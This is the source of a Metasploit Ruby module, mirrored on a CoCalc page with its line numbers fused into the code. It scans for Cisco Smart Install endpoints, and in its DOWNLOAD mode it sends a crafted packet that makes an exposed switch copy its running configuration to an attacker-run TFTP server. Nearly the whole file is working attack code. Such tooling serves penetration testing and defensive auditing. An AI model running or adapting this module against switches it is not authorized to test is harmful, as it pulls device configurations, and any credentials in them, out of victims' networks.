CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/misc/cisco_smart_install.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Cisco8include Msf::Auxiliary::Scanner9include Msf::Auxiliary::Report1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Identify Cisco Smart Install endpoints',16'Description' => %q(17This module attempts to connect to the specified Cisco Smart Install port18and determines if it speaks the Smart Install Protocol. Exposure of SMI19to untrusted networks can allow complete compromise of the switch.20),21'Author' => ['Jon Hart <jon_hart[at]rapid7.com>', 'Mumbai'],22'References' =>23[24['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],25['URL', 'https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature'],26['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi'],27['URL', 'https://github.com/Cisco-Talos/smi_check'],28['URL', 'https://github.com/frostbits-security/SIET']2930],31'License' => MSF_LICENSE,32'DefaultAction' => 'SCAN',33'Actions' => [34['SCAN', 'Description' => 'Scan for instances communicating via Smart Install Protocol (default)'],35['DOWNLOAD', 'Description' => 'Retrieve configuration via Smart Install Protocol']36],37)38)3940register_options(41[42Opt::RPORT(4786),43OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),44OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 10]),45OptString.new('CONFIG', [ true, "The source config to copy when using DOWNLOAD", "system:running-config" ])46]47)48end4950# thanks to https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L5351SMI_PROBE = "\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00".freeze52SMI_RE = /^\x00{3}\x04\x00{7}\x03\x00{3}\x08\x00{3}\x01\x00{4}$/53def smi?54sock.puts(SMI_PROBE)55response = sock.get_once(-1)56if response57if SMI_RE.match(response)58print_good("Fingerprinted the Cisco Smart Install protocol")59return true60else61vprint_status("No match for '#{response}'")62end63else64vprint_status("No response")65end66end6768def start_tftp69print_status("Starting TFTP Server...")70@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })71@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }72@tftp.start73add_socket(@tftp.sock)74@main_thread = ::Thread.current75end7677def cleanup78# Cleanup is called once for every single thread79if ::Thread.current == @main_thread80# Wait 5 seconds for background transfers to complete81print_status("Providing some time for transfers to complete...")82sleep(5)8384if @tftp85print_status("Shutting down the TFTP service...")86@tftp.close rescue nil87@tftp = nil88end89end90end9192#93# Callback for incoming files94#95def process_incoming(info)96return if not info[:file]97name = info[:file][:name]98data = info[:file][:data]99from = info[:from]100return if not (name && data && from)101102# Trim off IPv6 mapped IPv4 if necessary103from = from[0].dup104from.gsub!('::ffff:', '')105106print_status("Incoming file from #{from} - #{name} (#{data.length} bytes)")107cisco_ios_config_eater(from, rport, data)108end109110def decode_hex(string)111string.scan(/../).map { |x| x.hex }.pack('c*')112end113114def request_config(tftp_server, config)115copy_config = "copy #{config} tftp://#{tftp_server}/#{Rex::Text.rand_text_alpha(8)}"116packet_header = '00000001000000010000000800000408000100140000000100000000fc99473786600000000303f4'117packet = (decode_hex(packet_header) + copy_config + decode_hex(('00' * (336 - copy_config.length)))) + (decode_hex(('00' * (336)))) + (decode_hex(('00' * 336)))118print_status("Attempting #{copy_config}")119sock.put(packet)120end121122def run_host(ip)123begin124case125when action.name == 'SCAN'126connect127return unless smi?128when action.name == 'DOWNLOAD'129start_tftp130connect131return unless smi?132disconnect # cant send any additional packets, so closing133connect134tftp_server = datastore['LHOST'] || Rex::Socket.source_address(ip)135request_config(tftp_server, datastore['CONFIG'])136print_status("Waiting #{datastore['SLEEP']} seconds for configuration")137Rex.sleep(datastore['SLEEP'])138end139rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \140::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e141vprint_error("error while connecting and negotiating Cisco Smart Install: #{e}")142return143ensure144disconnect145end146147service = report_service(148host: rhost,149port: rport,150proto: 'tcp',151name: 'Smart Install'152)153154report_vuln(155host: rhost,156service: service,157name: name,158info: "Fingerprinted the Cisco Smart Install Protocol",159refs: references,160exploited_at: Time.now.utc161)162end163end164165166